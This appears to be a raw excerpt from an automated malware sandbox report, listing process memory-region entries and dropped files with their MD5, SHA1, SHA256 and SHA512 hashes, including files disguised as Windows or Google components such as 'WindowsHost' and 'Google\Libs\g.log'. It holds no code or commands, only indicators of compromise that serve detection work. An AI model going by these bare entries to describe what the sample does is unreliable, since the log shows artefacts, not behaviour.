SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

memory/5076-460-0x0000000000000000-mapping.dmp

memory/3492-463-0x0000000000000000-mapping.dmp

memory/940-464-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ed40265bc41f67f9b43ab9af4c778fc4
SHA1 82dc7e119ee84c74e7993bb18a516f669394b03b
SHA256 5c9eff5fa774ccf71f6c628402290a097e29c1aca175d577f2d38d2100fa0a3b
SHA512 74e2b7cd6340ed11a4ac2155b990664054ae1b182461cef9121299db97b2700949faf3978693abcac3e7e2b79d441a325ce0de79420ae53e86400261b6264990

memory/3816-467-0x0000000000000000-mapping.dmp

memory/3360-468-0x0000000000000000-mapping.dmp

memory/4128-473-0x0000000000000000-mapping.dmp

memory/3488-476-0x0000000000000000-mapping.dmp

memory/4572-475-0x0000000000000000-mapping.dmp

memory/1168-479-0x0000000000000000-mapping.dmp

memory/744-482-0x0000000000000000-mapping.dmp

memory/4712-486-0x0000000005F20000-0x0000000005F70000-memory.dmp

memory/416-487-0x0000000000000000-mapping.dmp

memory/2912-490-0x0000000000000000-mapping.dmp

memory/4520-491-0x0000000000000000-mapping.dmp

memory/2300-492-0x0000000000000000-mapping.dmp

memory/4712-508-0x0000000006920000-0x0000000006AE2000-memory.dmp

memory/4712-509-0x0000000007020000-0x000000000754C000-memory.dmp

memory/4952-517-0x00007FF6E53A0000-0x00007FF6E6421000-memory.dmp

memory/3556-518-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5e51717fdd25d6eed0d48cd8ff4b2961
SHA1 fd16ded3eda88a86b6e9654fff829cef01cb00af
SHA256 a6bec2c9e3362d7cb9ca8bb3cf6922ce6a75bfbc11dc352d949476e6522e741a
SHA512 7ffc27dfebde4dcff968964b59f474711a9a98ecd6474f621e0ca6da4d2d6342fd7c4dcd5caed68823a2eaf5db0821c41d9dab07273d184885bc58f510060fa7

memory/4712-524-0x0000000006290000-0x00000000062AE000-memory.dmp

memory/4032-531-0x0000000000000000-mapping.dmp

C:\Program Files\Windows\WindowsHost

MD5 bf41699ea8e7a4ddc8989a616909c05d
SHA1 1f39ca29bec36d9971fd67a04e48108afa487b39
SHA256 ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1
SHA512 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634

C:\Program Files\Windows\WindowsHost

MD5 bf41699ea8e7a4ddc8989a616909c05d
SHA1 1f39ca29bec36d9971fd67a04e48108afa487b39
SHA256 ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1
SHA512 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634

memory/5096-535-0x00007FF7CECC0000-0x00007FF7CFD41000-memory.dmp

memory/4912-557-0x000001E9F89B0000-0x000001E9F89CC000-memory.dmp

memory/4912-563-0x000001E9F8EE0000-0x000001E9F8F99000-memory.dmp

memory/4912-596-0x000001E9F89D0000-0x000001E9F89DA000-memory.dmp

memory/5056-684-0x0000000000000000-mapping.dmp

memory/3572-685-0x0000000000000000-mapping.dmp

memory/3492-686-0x0000000000000000-mapping.dmp

memory/2928-687-0x0000000000000000-mapping.dmp

memory/940-688-0x0000000000000000-mapping.dmp

memory/2116-689-0x0000000000000000-mapping.dmp

memory/3332-690-0x0000000000000000-mapping.dmp

memory/3360-691-0x0000000000000000-mapping.dmp

memory/4632-692-0x0000000000000000-mapping.dmp

memory/4192-693-0x0000000000000000-mapping.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 573d77d4e77a445f5db769812a0be865
SHA1 7473d15ef2d3c6894edefd472f411c8e3209a99c
SHA256 5ec3f268845a50e309ae0d80bcee4f4dd4cd1b279ab1e64b523a057c11074f1c
SHA512 af2422a9790a91cdcbe39e6ef6d17899c2cbd4159b1b71ac56f633015068d3afc678fcef34892575bf59bdf7d5914ec6070864940d44130263fe84e28abba2dc

memory/2220-694-0x0000000000000000-mapping.dmp

memory/4228-699-0x0000000000000000-mapping.dmp

memory/5104-701-0x0000000000000000-mapping.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 631f4b3792b263fdda6b265e93be4747
SHA1 1d6916097d419198bfdf78530d59d0d9f3e12d45
SHA256 4e68d2d067c5680a2e55853ac58b16f199b09f1b9e5f2174605fff18da828976
SHA512 e0280041c4ca63971ab2524f25d2047820f031c1b4aeb6021a3367297045ddf6616ffccafb54630eb07fd154571d844329ebcc34d6ce64834cb77cba373e4fbe

memory/3188-706-0x0000000000000000-mapping.dmp

memory/4292-931-0x0000017F55890000-0x0000017F558AC000-memory.dmp

memory/5096-940-0x00007FF7CECC0000-0x00007FF7CFD41000-memory.dmp

memory/960-967-0x00007FF6AE7D14E0-mapping.dmp

memory/524-970-0x0000000000000000-mapping.dmp

C:\Program Files\Google\Libs\g.log

MD5 fdba80d4081c28c65e32fff246dc46cb
SHA1 74f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256 b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512 b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

memory/412-972-0x00007FF6F9402720-mapping.dmp

memory/5096-974-0x00007FF7CECC0000-0x00007FF7CFD41000-memory.dmp

memory/412-977-0x00007FF6F8C10000-0x00007FF6F9404000-memory.dmp

memory/412-978-0x0000028BAF310000-0x0000028BAF330000-memory.dmp

memory/412-979-0x00007FF6F8C10000-0x00007FF6F9404000-memory.dmp

memory/412-980-0x0000028BAF360000-0x0000028BAF380000-memory.dmp

memory/412-981-0x0000028BAF360000-0x0000028BAF380000-memory.dmp